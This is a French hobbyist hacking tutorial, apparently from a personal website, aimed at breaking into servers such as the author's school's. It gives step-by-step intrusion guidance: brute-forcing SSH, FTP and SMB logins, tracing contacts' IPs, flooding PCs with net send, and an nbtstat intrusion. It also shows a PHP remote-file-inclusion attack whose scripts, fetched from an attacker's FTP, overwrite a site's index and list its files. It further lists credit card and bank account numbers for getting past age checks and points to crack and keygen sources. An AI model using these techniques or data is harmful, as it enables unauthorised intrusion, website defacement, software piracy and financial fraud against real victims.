1.1 Généralités sur les
IP
Une IP , Internet protocole, est une adresse
informatique en chiffres (198.24.231.45) elle est présente chez tous les
ordinateurs qui sont connectés à un réseau ou non et change tous les 20
minutes si la conexion est active (sauf 56K, freebox, demande auprès
du FAI), on parle d'IP dynamique. Sur un réseau local, l'adresse sera toujours du type:
192.168.0. suivi du numéro identifiant l'ordinateur dans le réseau
Un nom de domaine est une IP en
lettre (google.fr) mais correspond à un IP en chiffre. Les serveurs qui
font les liens entre nom de domaine (simple) et IP (complexe et
changeantes) sont les serveurs DNS. Un programme updater de DNS est
nécessaire à un serveur pour mettre à jour l'IP par rapport au nom de
domaine. Les IP peuvent être suivies de :xxxx (198.24.231.45:21)
ces chiffres x indiques le numéro de port, il y en a une infinités et ils
sont virtuels.
1.2 Avoir
l'adresse ip et avoir le ping du serveur - DNS la base
Par exemple mon lycée
(La Merci qui a un site Internet : http://www.anti-lamerci.sup.fr/).
Pour avoir son ip il suffit de faire une requête de ping. Ouvre MS-DOS ou
un invité de commande (en étant connecté) et tape "ping lamerci.com" (sans
ce qui peut suivre /images/logos/... ) tu as le ping mais aussi l'adresse
ip du serveur du lycée La Merci. C'est 213.186.37.58 pour le moment il
faut que le serveur soit actif , en général il l'est 24h/24 pour les
serveurs http (sites internet)
Avec l'ip on a aussi l'adresse électronique
exacte d'une personne il est ensuite facile de l'atteindre, le déranger
est difficile et c'est là que commence le piratage. Les ip personnels,
c'est à dire celles qui ne sont pas celles d'un serveur changent tous les
20 minutes et pendant la navigation. Les serveurs de données de types
DNS ont dans leur disque dur un tableau à 2 entrées : 1 les adresses ip
des serveurs 2 les adresses URL. C'est grâce à eux qu'on connait l'ip
grâce à un URl (http://nom_de_domaine) et c'est aussi grâce à eux que
lorsqu'on tape une URL dans un navigateur on arrive sur tel site. Une
autre commande DOS 'nslookup' est intéressante regarder avant le chapitre
2.
Voici un programme pour scanner les
ip par tranches, en plus tu peux faire pas mal de fonction via ce prog en
plus du ping. Il s'appelle WS_ping pro hack et il est téléchargeable sur
http://www.ipswitch.com/downloads/index.asp parmi
la liste des autres produits de iswtch. note : c'est un freeware mais des
clés circulent et sont faciles à trouver sur le
net.
• Comment trouver une ip
d'un contact MSN. • tracer physiquement une
ip • un programme DNS plus rapide que le ping pour avoir l'ip
d'un serveur • ip sniffer en php3
Autre méthode : il faut un socket c'est à dire une
connexion directe (msn : webcam ou audio ou transfert de fichier, ICQ,
mIRC, serveur,etc). Il faut d'abord que tu ouvres une fenêtre dos (pour
l'invité de commande tape 'cmd' dans executer), dans la fenêtre dos tu
tapes netstat, tu repères la personne est le port qu'elle a ouvert par
exemple: abcdef aol.com:6667, ensuite netstat -n pour avoir toutes les ip
connectées à ton pc (on peut voir ceux qui bloquent) tu regardes le port
ouvert ex:abcdef aol.com:6667 (6667 étant le port ouvert dans l'exemple)
et tu repères l'ip attachée au port. Bon moi perso je propose le logiciel
éthéreal (téléchargeable de mon site) qui est beaucoup mieux voir 6 et o
peut savoir qui bloque ou est hors ligne. Attention avec les nouvelles
versions de MSN l'ip du serveur MSN s'affiche aussi si tu n'as pas une
conexion directe. Tu peux après avoir fait le netstat tracer la
connexion et se renseigner sur l'itinéraire prit part tes données avec la
commande DOS 'tracert' de syntaxe 'tracert'espace 'ip' (attention
aux firewall qui bloquent cette commande)
pour les mails : les
mails envoyés par pop3 possèdent dans leur entête caché l'adresse ip
du pc serveur qui a envoyé le mail et l'ip de l'envoyeur. Attention l'ip
change souvent. Par défaut les boites mails n'affichent pas ces
informations mais on peut généralement le demander dans les options. [pour
hotmail] ci-dessous ce qu'affiche la messagerie hotmail
:
1. ... ip personnel du posteur 2.
... adresse d'envoie du message 3. ... adresse qui relaie le
message (généralement la même que celle qui envoie) 4. ...
adresse de réponse (généralement la même que celle qui envoie ou relaie le
message) 5. ... option pour afficher le code html du mail et un
éventuel code caché
1.3 La commande DOS 'nslookup'
elle permet d'interroger un
serveur DNS afin d'obtenir les informations concernant un domaine ou un
hôte et permet ainsi de diagnostiquer les éventuels problèmes de
configuration du DNS. Invoqué sans argument, la commande nslookup
affiche le nom et l'adresse IP du serveur de noms primaire et affiche une
invite de commande pour l'interrogation. Il suffit de taper le nom d'un
domaine à l'invite afin d'en afficher les caractéristiques. Il est
également possible de demander les informations sur un hôte en indiquant
son nom à la suite de la commande nslookup : nslookup host.name
Par défaut la commande nslookup
interroge le serveur de noms primaire configuré sur la machine. Il est
toutefois possible d'interroger un serveur de noms spécifique en le
spécifiant à la suite de la commande précédé du signe "-" :
nslookup host.name -serveur.de.nom
Il est possible de modifier
le mode d'interrogation de la commande nslookup grâce à la clause
set :
- set type=mx permet de recueillir les
informations concernant le ou les serveurs de messagerie d’un domaine.
- set type=ns permet de recueillir les
informations concernant le serveur de noms associé au domaine
- set type=a permet de recueillir les
informations concernant un hôte du réseau. Il s'agit du mode
d'interrogation par défaut.
- set type=soa permet d'afficher les
informations du champ SOA (Start Of Authority).
- set type=cname permet d'afficher les
informations concernant les alias.
- set type=hinfo permet, lorsque ces
données sont renseignées, d'afficher les informations concernant le
matériel et le système d'exploitation de l'hôte.
Pour sortir de la commande nslookup, il suffit de
taper exit.
1.4 Adresse réseau
MAC
Il s'agit des adresses physiques des cartes
adaptateurs. Ces adresses sont codés en 48 bits par les constructeurs de
matériels réseau. Il est important de comprendre qu'une adresse MAC est
totalement d'une adresse IP car elle est unique, autrement dit elle
restera la même jusqu'à la fin de sa vie, et par la suite, aucun
ordinateur ne pourra la réutiliser !
Les adresses sur 48 bits sont
uniques : l' IEEE attribue à chaque constructeur un numéro (6 chiffres
hexadécimaux) spécifique. Le constructeur gère ensuite lui-même les autres
bits disponibles de l'adresse. Ainsi, quel que soit l'origine du matériel,
il n'y à pas de conflit d'adresses physiques possible sur le
réseau.
2. Vérifier
qu'un le port est ouvert
il faut qu'avec un serveur linux ou un autre
logiciel tu te connecte sur l'ip serveur de la merci, en bash c'est à dire
via un serveur linux tape "# nmap ip_a_scanner" en windows c'est du DOS
standard mais il n'y pas de possibilités suffisante pour du piratage ou
même de l'étude de réseau avec scannage des ports. Tu as le numéro des
ports et leur état. bien sur il y a 400 façons de voir l'état des ports
certains sites public le proposent. De mon site tu peux télécharger
PortScan :
Téléchargements : • Portscan
(.rar) voir le tutorial de port
scan new • nmap pour windows (600Ko .zip
v3.93) • Tutorial : avoir un serveur ssh, s'en servir pour
faire des nmap
3. Le vif du
sujet -Putty- client SSH
Bon bref passons à Putty, munis toi de
l'adresse IP du serveur à pénétrer . Clique
ici pour ouvrir la page putty ensuite tu cliques sur la version qui
t'intéresse par exemple xp en haut à gauche tu fais EXÉCUTER OU OUVRIR
mais pas enregistrer. Putty s'ouvre tape l'adresse ip ou l'URL
(nom_su_serveur.com). La fenêtre putty s'ouvre si le port choisit est
ouvert et là plusieurs commande sont faisables mais avant tout il faut
comprendre le principe de putty. Le client (toi) utilise un protocole ssh
pour aller sur le serveur hote qui lui utilise un protocole sshd, le
premier S voulant dire secure (sécurisé) donc il y a un login (nom
d'utilisateur) et un password (mot de passe) donc il faut savoir les login
et les passwords des administrateurs pour avoir les pleins pouvoirs et
après c'est comme si t'étais sur place. Ce mot de passe et ce login
peuvent être trouver avec des logiciel comme Brutus téléchargeable de ce
site.
. télécharger
putty et winPcap
4. Commande principales
des consoles
SOUS LINUX |
SOUS WINDOWS |
COMMENTAIRES |
-BASH- |
-MS
DOS- |
noms du
langage |
cd |
cd |
permet de naviguer dans les
dossiers |
ls |
dir |
affiche les
directory |
cp |
copy |
copie des fichiers (to =
vers) |
mv |
move |
déplacer des
fichiers |
mkdir |
mkdir |
créer une nouvelle
directorie |
rm |
erase /
del |
supprime |
|
|
|
5. exemple
clique ici
pour observer un imprimé de mon écran qui t'expliquera
mieux
6. Le
logiciel Ethereal, base de toutes études de réseaux
Son nom vient d'Ethernet, le port de ta carte
réseau et real qui signifie réel. En fait ce logiciel a de nombreuses
utilités dont la principale est de voir tout ce qui passe via ta
connexion, les ip plus ou moins complexes, le protocole Internet et les
détails maximums. Tu testes ainsi ton firewall et peux voir si quelqu'un
t'en veux ! Il nécessite le petit programme WinPcap pour fonctionner. Tu
peux télécharger Ethereal et WinPcap en cliquant ici et voir des imprimés
d'écran en cliquant là
ou encore lire le manuel
d'aide. Si tu es connecté via un modem qui fait firewall (ex: wanadoo
livebox) les ip donnés peuvent être faussées. Ethereal s'utilise pour
étudier le réseau et ainsi (par exemple) voir qui vous bloque sur
msn...
•
télécharger
Ethereal et WinPcap
7. Hack via
FTP
Le FTP est un protocole de transfert mais on
parle aussi de FTP pour un espace en ligne où les sites web sont stockés.
Après putty et le ssh via le port 22, il existe le FTP (file transport
protocole) qui passe par les ports 20 et 21. C'est le moyen de transfert
le plus simple et le plus rapide. Il est pratique car si tu essayes de te
connecter via ftp sur un serveur mal configuré tu connais déjà le mot de
passe et le login. En effet si il est mal configuré il accepte les
utilisateurs anonyme donc le login est "anonymous" et il n'y a pas de mot
de passe ou alors c'est 'anonymous'. Le mieux est d'avoir le login
administrateur et ainsi avoir les pleins pouvoirs bien qu'ils soient
limitées par le peu d'instruction que le FTP comporte. Internet explorer
traite le ftp, on dit qu'il est client FTP et sous MS-DOS les principales
commandes sont put, get , open. Tape help pour avoir la liste des
commandes. Attention il faut d'abord dire que tu veux utiliser ftp, tape
juste ftp puis entrer. Cette méthode est nettement moins bien et n'est pas
considérée comme du Hacking. Internet Explorer 6 n'est pas génial pour le
FTP mais est largement suffisant. Imagine que brutus (voir plus haut)
te trouve le login et le mot de passe d'un FTP d'un site... c'est la fête.
Ici le FTP est un espace de donnée stocké sur un serveur où le siteweb ou
des données sont enregistrés. Tu peux donc modifié un siteweb, il y a pas
si longtemps on pouvait facilement le faire pour les sites des mairies,
des écoles, ...
8. petite liste de protocoles
Internet
Samba
(windows) ssh (secure serveur
host) ftp (file transport protocole
- le plus rapide) Ping (pour avoirs le
temps de réponse du serveur en ms) X-Window (linux ou
windows) VNC (utilitaire de commande à
distance) http (pages
internet) https (pages internet
cryptées) telnet (prise de contrôle à distance
windows pas très sécurisé) mms (données
sécurisée)
9. faire planter
Windows avec netsend [Hack léger]
J'ai lu cette idée sur http://www.projectnews.fr/ un
site mignon avec un bon forum. Je l'ai un peu modifié mais merci malgré
qu'elle ne marche pas avec les systèmes d'exploitation
récents.
On va créer un petit programme en .bat tout con qui se
chargera d'expédier les message dès que vous cliquerez dessus et ainsi
saturer windows. Voici la procédure:
1)Ouvre le bloc note, notepad
voir word 2)Tape la ligne suivante: net send 81.52.234.58 salut!
(mettez l'ip de l'ordinateur a attaqué a la place de 81.52.234.58 et
le message que vous voulez a la place de salut! ) 3) send.bat (send.bat
est le nom du prog à appeller) 4) maintenant va falloir enregistrer ton
mini programme DOS en .bat -va dans enregistrer sous -nom du
fichier send.bat par exemple Au lieu d'appeller un prog externe on peut
aussi faire une boucle. NETSEND est un SERVICE windows qui peut être
désactiver. Pour plus d'informations va voir dans les astuces
d'informatique en cliquant
ici
10. site de
hack en ligne
Tu as besoin d'une clé pour un
logiciel, même récent, ou encore un générateur de clé? Tu as peut-être
besoin d'un crack no-cd ? Un seul site pour faire efficacement ce genre de
recherche, un peu plus haut se trouve la astalavista box c'est le
moteur de recherche de crack, de patch et de sérials le plus important au
monde , en effet depuis peu tu peux faire ce genre de recherche
directement du site de dagost : [lien]
11. programmes de crack
un crack ou un patch est un fichier
qui remplace le point exe de lancement ou pré enregistre des clé dans le
setup par exemple. Un générateur génère des clés. Oscar est un générateur
de générateur de clé.
Des logiciels existants sont des
bases de données de numéros de série et de générateur de clé mais aussi de
patch no cd. Voir de cartes de crédits mais là je ne suis plus d'accord.
Voici une liste et les liens. Ces programmes sont évidements illégaux et
simples à avoir c'est que du texte et des mises à jours annuelles à
récupérées !
noms |
adresses internet
(url) |
logo
|
Sérial2K |
http://www.serialz.to/s2kupdates.html |
|
Oscar |
EFnet demande la Oscar
Team |
|
Antares |
Email
sinwolf@usa.net |
|
sérial
99 |
cachée il faut
passé par IRC puis EFnet |
|
IRC ?
au travers du réseau IRC. Un serveur
peut être connecté à plusieurs serveurs et maintenir des centaines de
clients. Le plus large, appelé EFnet (Eris Free net), sert plus de 15000
utilisateurs à n'importe quel moment donné. Les plus petits, comme IRCNet
(10000), Undernet (10000) et Dalnet (8000) sont secondaires. mIRC est un
service de chat légal ou il y a moyen de trouver des hacker susceptibles
de te donner accès aux site de piratage temporaires cachés, depuis
quelques années le niveau baisse... Il est facile de se créer un serveur
IRC.
12.
problèmes liés à des sites à restrictions
Certains sites nécessitent la preuve
que vous êtes majeurs pour pouvoir commercialisé ou juste montrer son
contenu. La preuve est en générale la possession d'une vrai carte de
crédit.
Eurocard France :
5130 0916 7342 5873 5130 4146 6084
9972 5130 0301 1656 3650 5130 9848 0001
0784 5130 0275 4937 4820 5130 3149 5179
5001 5130 1974 9103 1403 5130 8317 5424
3269 |
Visa citibank :
4013 8325 4108 9838 4013 1810 1327
0793 4013 0569 7525 8525 4013 4948 5624
7392 4013 9327 3723 6258 4013 6657 5370
3534 4013 6042 9684 1311 4013 3773 9549
3793 |
Numéro de comptes bancaires :
B.N.P
:
No de
banque : No
Guichet: No de compte
: clé de RIB:
30004
05623
94955664872
63
Autre
:
No de
banque : No
Guichet: No de compte
: clé de RIB:
44295
15857
00966926809
22
70195
14880
38801927592
97
12260
86002
03744600026
89
13. Réinitialisez vos mots de passe NT
Avec un ordinateur, on rencontre souvent des
situations où toutes les méthodes traditionnelles de dépannage semblent
inefficaces ou inappropriées. C’est précisément la passion des hackers que
de trouver des solutions, le plus souvent élégantes, à des problèmes réels
alors impossibles à résoudre. On va voir dans l’exemple de cet article que
des outils qui ne pourraient servir, au premier abord, qu’à des pirates
peuvent se révéler salvateurs, dans des conditions légitimes et pas si
rares que ça.
13.1 Hashage et mots de passe NT
Aucun
système d’exploitation moderne ne stocke plus de mot de passe en clair,
c'est-à-dire en toutes lettres, tel que l’utilisateur doit le taper. Il
existe des méthodes mathématiques qui permettent de coder un mot de passe
de manière irréversible. On entend par là qu’il n’est pas possible de
reconstituer le mot de passe à partir de sa version codée. Pour être plus
exact, on peut dire qu’il est infiniment plus difficile de décoder que de
coder, dans la mesure où il faudrait un nombre astronomique d’heures de
calcul pour le faire. On peut alors se demander comment le système
peut valider un mot de passe alors qu’il n’en connaît qu’une forme codée.
En fait ce sont les résultats du codage qui sont comparés. Pour se faire
une idée du genre du genre de procédé dont il s’agit on peut prendre comme
exemple le codage rudimentaire suivant : multiplier le numéro des lettres
du mot de passe. Le mot de passe ABCD deviendrait alors 1 x 2 x 3 x 4 =
24. PASSWORD deviendrait 16 x 1 x 19 x 19 x 23 x 15 x18 x 4 = 143475840.
Ainsi si l’utilisateur tape ABCD au lieu de PASSWORD, le système s’en
rendra compte en voyant que 24 est différent de la valeur 143475840
inscrite pour cet utilisateur. Ce type de codage présente cependant de
nombreux défauts. D’une part le calcul ne permet pas de distinguer les
anagrammes (WORDPASS donne aussi 143475840). D’autre part la
transformation n’est pas irréversible : il est possible d’énumérer
facilement toutes les combinaisons de multiplications dont le résultat est
un nombre donné en le factorisant, donc de trouver tous les mots de passe
valides. Les systèmes d’exploitation font plutôt appel à des fonctions
cryptographiques beaucoup plus solides. Windows NT utilise notamment la
fonction de hashage MD4 qui permet de transformer une chaîne de caractères
de longueur quelconque en un mot de taille fixe (128 bits). Ce hash est
stoqué pour chaque mot de passe dans une partie de la base de registres,
stockée dans un fichier baptisé SAM (pour Security Accounts Manager).
13.2 Pour accéder aux
partitions NT
L’idée est la
suivante : remplacer le « hash » de l’Administrateur par celui d’un mot de
passe que l’on aura choisi. Pour réaliser cette opération presque
chirurgicale, il nous faut l’accès en écriture au système de fichiers de
NT (NTFS). on pourait brancher le disque dur sur un autre système capable
d’y accéder, par exemple un autre poste Windows NT. mais cependant je
préfère ne pas rentrer dans les détails. evidement nous disposons d’un
lecteur de disquettes (le lecteur CD-ROM pouvant aussi faire l’affaire),
nous avons plutôt choisit une solution qui tire profit de ce périphérique.
Il existe en effet des systèmes d’exploitation qui tiennent sur une
disquette et qui permettent des prouesses. En particulier, il existe des
mini-distributions de GNU/Linux qui contiennent la majorité des outils
dont on aurait besoin pour récupérer un système en panne. C'est pas mal de
cherché une solution de ce type parce que Linux intègre depuis pas mal de
temps des drivers pour NTFS.
RIP
RIP (pour Rescue Is Possible :) ) est un système Linux
spécialement conçu pour les coups durs et qui tient sur une disquette (il
existe une version CD-ROM). Il suffit de faire booter l’ordinateur depuis
le lecteur de disquette pour obtenir un système GNU/Linux de base duquel
on peut lancer, par ligne de commande, une série d’outils qui permettent
de réparer, analyser ou sauvegarder le système préexistant. RIP permet de
manipuler les données contenues sur le disque dur et sait interpréter tous
les systèmes de fichiers usuels. On peut l’utiliser, par exemple, pour
récupérer des fichiers importants sur un disque dur partiellement
endommagé et les graver sur un CD de sauvegarde. aide : qu'est ce qu'une disquette de boot
?
13.4 Retrouver le mot de passe BIOS
RIP comprend également un outils fort intéressant qui
sait déchiffrer le mot de passe de la plus part des BIOS. Contrairement à
ce que l’on a dit des systèmes d’exploitation, le BIOS mémorise les mots
de passe de manière réversible. L’auteur de cet outil a rassemblé (ou
reconstitué) les algorithmes d’un grand nombre de marques. Le programme
les applique systématiquement à la mémoire du BIOS. On voit apparaître
le mot de passe (WEAK !) dans l’exemple qui suit, encore une fois vive
Linux.
# cmospwd
CmosPwd – BIOS Cracker 4.3, 16 June
2003, Copyright 1996-2003 GRENIER Christophe,
grenier@cgsecurity.org http://www.cgsecurity.org
Keyboard : US
Acer/IBM................................[ ] AMI
BIOS...............................[I %5] AMI WinBIOS
(12/15/93)..........[ EAK!] AMI WinBIOS 2.5....................[WEAK!]
[ ] [* ] AMI ?....................................[ ] [Y] [ ] [0]
Award 4.5x/6.0.......................[2213] [21322030] [000100]
[...]
Ce type de programme sait également décoder les mots
de passe de certains BIOS de Compaq, Phoenix, Gateway, Toshiba, IBM,
Thinkpad et quelques autres. Il est aussi possible de faire des copies de
sauvegarde du BIOS, ou d’en effacer complètement la mémoire. Bien entendu,
comme il faut au moins démarrer sur le lecteur de disquette pour utiliser
ce programme, il n’est pas possible de décoder le mot de passe BIOS s’il
est demandé au démarrage de l’ordinateur. Dans ce cas de figure, la
solution la plus simple consiste à débrancher la pile qui alimente la
mémoire BIOS. Il s’agit d’une petite pile plate, ronde, clipsée sur la
carte mère. Nous avons tenté l’expérience avec notre AMI WinBIOS et nous
avons pu observer que ce BIOS, lorsque la pile est absente, propose de
rétablir les paramètres par défaut (sans mot de passe ce qui est rare).
Une fois la pile remise en place, l’ordinateur a continué de fonctionner
correctement, la protection en moins.
Solution
clé en main
Un dernier outil proposé par RIP a finalement
attire l'attention : chntpw. Ses fonctionnalités correspondent exactement
à ce que jev voulais vous montrer plus haut, à savoir modifier le fichier
SAM pour remplacer le hash des mots de passe que l’on veut réinitialiser.
il y cependant à une limite majeure de RIP : la version de Linux qui en
est le moteur ne permet l’accès à NTFS qu’en lecture. on peut donc
modifier une copie du fichier SAM, mais pas la substituer au fichier
original. Il faut donc fabriquer une disquette (floppy) bootable qui
contient une version récente de Linux capable d’accéder en écriture
(write) à une partition NTFS. Il fallait également qu’elle contienne le
programme chntpw. Google te désigne une page qui nous a permis d’aboutir
(l’adresse du site est donné à la fin de l’article). Il s’agit aussi d’une
mini-distribution, mais cette fois focalisée sur les mots de passe NT.
Contrairement à RIP, il n’est pas nécessaire de taper de commandes,
seulement de répondre à des questions (avec des réponses par défaut entre
crochets, qui sont proposée à partir d’un diagnostic système). La
première étape est de copier l’image de la disquette sur son support
physique. On trouve dans la rubrique Download de la page, la disquette
(archive bd030426.zip, dernière version en date) et l’utilitaire
(rawrite2.zip) qui permet de la copier. Si tous les fichiers sont dans le
même répertoire, cette commande DOS transfère l’image sur une disquette
insérée au préalable :
C: tpasswd) rawrite2.exe –f bd030426.bin –d
A:
Une fois que l’ordinateur a démarré sur le lecteur de
disquette et que Linux est chargé, un script prend la relève et assiste
l’utilisateur. Une première question concerne les interfaces SCSI. On peut
répondre « n » (si NT est installé sur un disque SCSI, il faut encore
télécharger une autre disquette, sc030426.zip). Ensuite, une liste des
partitions disponibles apparaît. Le script choisis pour nous la première
partition de boot NT. Au menu suivant, on choisit de changer des mots de
passe (par défaut). Avant de lancer chntpw, le script s’inquiète
encore du chemin du fichier SAM. il faut parfois intervenir ici, parce que
le chemin par défaut (winnt/system32/config) correspond à NT, et non à
Windows 2000 (windows/system32/config). Après une ou deux autres
réponses par défaut (Enter), on se retrouve dans le programme chntpw. Il
suffit de choisir un utilisateur puis de lui donner un nouveau mot de
passe, comme on le voit ici :
Username to change ( ! to quit,
. to list users): [Administrateur] RID : 0500 [01f4] Username:
Administrateur fullname : Administrateur comment : Compte mis à
niveau depuis Windows 95 ou Windows 98 homedir :
Crypted
NT pw: 01 00 01 00 01 9f e4 0f 94 c5 2b 4a c8 49 8e 83 Crypted LM pw:
01 00 01 00 49 e5 7a b4 72 0c 2b 76 c8 71 fc 22 MD4 hash : d0 51 37 f2
02 7f dc b8 8e 7e 90 31 bf 62 e5 23 LANMAN hash : d3 7a 2e fe 5d 1f 57
32 cc 6e 92 cb 58 39 10 8b
Please enter new password or
nothing to leave unchanged: nouveau
NEW MD4 hash : c3 16 4e 9e
17 7e a6 cc 80 5a 4a 53 a2 d5 79 76 NEW LANMAN hash: 78 5b 76 91 07 0d
26 3a aa d3 b4 35 b5 14 04 ee NEW DES crypt : 10 5d 0c bf 24 86 bb 65
a3 e2 f2 85 2a b9 42 d4 NEW LANMAN crypt: c1 95 2c 26 2d a1 db bf 3a
0f 64 36 af f3 88 1f
Une fois sorti de chntpw, le script
demande une double confirmation avant d’écraser l’ancien fichier SAM par
le nouveau. En suivant cette démarche, nous avons pu nous identifier sans
encombre, lorsque nous avons redémarré Windows 2000.
Mais les pirates ? Nous avons montrés qu’il
était possible, sans connaissances particulières, si l’on possède les bons
outils, d’accéder au compte administrateur d’un poste NT. Nous avons
réellement contourné le système de sécurité, en utilisant les
périphériques de l’ordinateur sans le contrôle de NT. La technologie des
ordinateurs personnels ne permet généralement pas au système
d’exploitation d’empêcher ce genre d’intervention. Pourtant, il faut
réaliser que ce que nous avons fait, une personne malveillante peut le
faire en quelques minutes sur un ordinateur qui ne lui appartient pas. On
s’étonne donc pas que les serveur importants sont le plus souvent sous
clé. Et c’est peut-être aussi une bonne raison de se méfier des malins qui
rôdent autour de son ordinateur.
Sites
Internet [en anglais] Tous les outils présentés sont des logiciels libres :
RIP
: http://www.tux.org/pub/people/kent-robotti/looplinux/rip/
cmospwd
: http://www.cgsecurity.org/cmospwd.html
chntpw
: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html
Offline
NT Password & Registry Editor : http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html
17. informations sur les ports - Le logiciel PortScan
- clique ici
14. cracker des login et des mdp Ð
La brute force est la
méthode la plus courante pour trouver un nom d'utilisateur (login) et le
mot de passe qui lui correspond. La vrai brute force consiste à tester
toutes les possibilités possibles mais en général on se tient à une
attaque par dictionnaire, c'est à dire à partir d'une liste de mot de
passe potentiels. Il y a deux choses importantes à savoir pour être
efficace : Avoir une bonne liste de mots de passe potentiels et avoir
plusieurs bandes passantes pour être plus efficaces s'il s'agit d'une
brute force. Les meilleurs programmes de brute force sont ceux en ligne
de commande parce qu'on peut les appeler d'un serveur distant. syntaxe
standard : protocole://login:password@serveur.ext:port/répertoire/
Brutus est un logiciel qui teste des
possibilités de login et de mot de passe pour tenter de trouver les bons
pour quelques protocoles, Il est l'exemple type du programme bien fait
mais inefficace sans quelques modifications. En effet il test différentes
possibilités à partir d'une liste de mots stockée en .txt (dico) qui est
intéressante mais souvent non adaptée. Mais Brutus, comme il est bien fait
te propose de tester les possibilités à partir de tes propres fichiers
textes! Donc si tu adaptes ta "wordlists" liste de mots et tes "words"
mots de passe éventuel au type de hack que tu souhaite le hack est rapide
et efficace. Attention néanmoins aux timeout de configuration de certains
serveurs. • Télécharge Brutus en cliquant
ici. . Nouveau : le tutorial
de brutus Pour ceux qui
n'aiment pas Brutus, et il y a de nombreuses raisons à cela, je mais à
votre disposition VcrackFTP, il est semblable a brutus mais est très
simple, ne brute que le protocole ftp et utilise des dictionnaires en
.txt. • Télécharge VcrackFTP et ses listes de password
(.rar 496Ko)
ibrute forcer pour formulaire http, htaccess et pop : wwwhack.exe :
cliquez ici ibrute forcer pour SMB (netbios) : •
SMBcrack (en ligne de commande) 25Ko
15. Empêcher
l'envoi d'info à Microsoft sous XP
Lorsque Internet Explorer ou un autre programme
provoque une erreur système, il envoie à Microsoft des informations
concernant cette erreur via le programme docteur watson (drwtsn.exe)
Pour des raisons de confidentialité, si tu ne souhaites pas informer
Microsoft de ta configuration logicielle et matérielle il faut, pour cela,
éditer la base des registres (regedit) puis te rendre à la clé
: HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerMain Si la
valeur IEWatsonDisabled n'existe pas, créez-la. Cliquez sur le menu
EditionNouveau, Valeur DWORD. nomme cette valeur IEWatsonDisabled.
Double clique dessus, puis saisis 0 dans le champ Données de la
valeur. Ferme la base de registres pour valider les changements.
16. Tracer une IP
Linux et Windows intègre la commande
'tracer' qui permet de tracer une adresse ip (cf: nslookup, ssh )
Les ip peuvent changent souvent au
cours des heures à part pour les malchanceux à ip fixe. elles sont plus
ou moins distribués aléatoirement. C'est à dire qu'avec un programme on
peut facilement voir ou est situé l'ordinateur de cette ip. AW IP locator
est un petit logiciel que tu peux télécharger de ce site et qui te
permettra de trouver le pays, la région et la ville de son propriétaire
mais aussi son ip de départ et de retour.
•
AW IP
locator D'autres programmes permettent de tracer une ip et
de montrer les étapes géographiquement : • Neo tracer Pro 1.8Mo .zip On peut aussi
trouver le FAI d'une Ip.
17. Pirater un site avec un mauvais code php/html
du style URL=...
Cette technique rare, basée
sur le dynamisme du php qui contient le site, fonctionne de moins en moins
mais permet à quelqu'un qui maîtrise un minimum l'informatique de bien
faire chier un webmaster mauvais en programmation. C'est un coup de bol si
tu en connais un, cette technique est presque impossible de nos jours,
mais si ça marche...
L'URL suivante http://www.site.com/index.php?page=test
dit qu'elle charge une page test.php standard puis y inclut le code de la
variable $page, suivit de l'extension PHP bien évidemment. ici la page qui
sera visible sera donc la page test.php.Il faut
comprendre que http://www.site.com/index.php?page=test revient à indiquer
l'URL http://www.site.com/test.php
Il faut trouver un site avec des
url mal foutue (où il y a un égal ) par
exemple : www.lesite.fr/index.php?url=page.php
http://www.site.fr/index.php?var=admin.php
Il est simple de vérifier s'il n'y
a pas de protection , essayes d'inclure une url (google.fr par exemple)
: http://www.lesite.fr/index.php?url=http://www.google.fr ou
http://www.site.fr/index.php?var=http://www.google.fr Là si l'index de google apparaît dans
le site , c'est que le site n'est apparemment pas protégé et facilement
piratable
on peut ensuite (par exemple) effacer le site Au
lieu d'ajouter une url il suffit d'ajouter du code par exemple
fwrite() ce qui
aura pour effet de d'éffacer l'index du site de la base de donnée php Il
suffit de faire ce petit script php et de le stoker sur ftp par exemple
pourqu'il soit permanent en introduisant le script
suivant:
$fp=fopen("index.php", w);
fwrite($fp,$msg); fclose($fp); ?>
|
*tu peux inclure un message
$msg="ton message";
Pour lancer ce script: www.lesite.fr/page.php?url=http://[adresse url du
script]/nom de la page du script.php
Pour afficher tous les noms de
fichiers du site (très utile pour savoir où se trouve le fichier
config.php , admin.php etc), créé un fichier avec le code php placé sur un
ftp par exemple, le code suivant scan le site php et t'affiches les
résultats.
<? function
scann($rep){ $dir=opendir($rep); while($file=readdir($dir)){ if(is_dir("$rep/$file")
&& $file!="." &&
$file!=".."){ scann("$rep/$file"); }else{ echo
"$rep/$file<br>"; } } } scann("."); ?> | une fois ce script sur ton ftp tu l'exécutes par le
serveur victime comme ceci
: http://url_sitephp/page.php?var=http://url_ftp/source_du_fichier.txt
(txt pas php) Maintenant que tu connais toutes les pages, les .htaccess
et les .htpasswd, tu peux les voir, les effacer et les modifier de la même
façon (voir code de suppression ci dessus)
18. passez la protection du clic
droit
certains sites interdisent l'utilisation du
clic droit via un script qui génère un message. Il suffit juste d'utiliser
mozilla Firefox ou d'appuyer sur entrée avec Internet explorer pendant le
message pour avoir accès au menu du clic droit. Pratique pour les skyblogs
par exemple. Personnellement sur mon site le message s'affiche mais il n'y
a pas moyen d'avoir accès au menu déroulant, vous pouvez retrouvez ces
scripts sur le forum du site.
19. Intrusion par Nbstat
Je croyais que ça ne marchait plus
et ben quelques fois si, de toutes façons c'est intéressant. Cette
technique consiste à s'introduire via le module de recherche de windows
sur un ordinateur distant. La cible doit avoir un firewall microsoft ou un
firewall mal configuré un vieu service pack si possible.
Tu dois connaitre l'adresse ip
du PC cible. Utilise Ethereal, ms-dos,une requête ping,... pour plus
d'infos reporte toi aux dossiers précédents. ensuite lance msdos
(cmd.exe) et tape "nbtstat -A 'ip' " .Si on te dis "Host not found" laisse
tomber... Par contre si parmi les données affichées tu voies un "20"
quelque part alors c'est bon. Tape maintenant "edit lmhosts" et édite
le fichier de la manière suivante : tapez l'ip suivi d'un espace suivi du
nom du pc entre guillemets (il est affiché quand vous faites
nbtstat -a...) 192.168.0.1 "name" par exemple. Enfin sauve le
fichier et retournez sous msdos. La tu tapes "nbtstat -R" (R
majuscule) Pour finir va sous windows et faites rechercher ordinateur :
sous windows ME (xp par exemple) tu dois aller dans rechercher, fichier ou
dossier, puis descendre un peu et sélectionner la case "ordinateur ou
personnes" tu dois voir apparaître le pc ciblé sinon c'est qu'il a une
erreur dans les étapes antérieures.
remarques
Si tu ne trouves pas la commande "rechercher ordinateur", fait un clic
droit sur poste de travail puis "connecter un lecteur réseau". Tapez
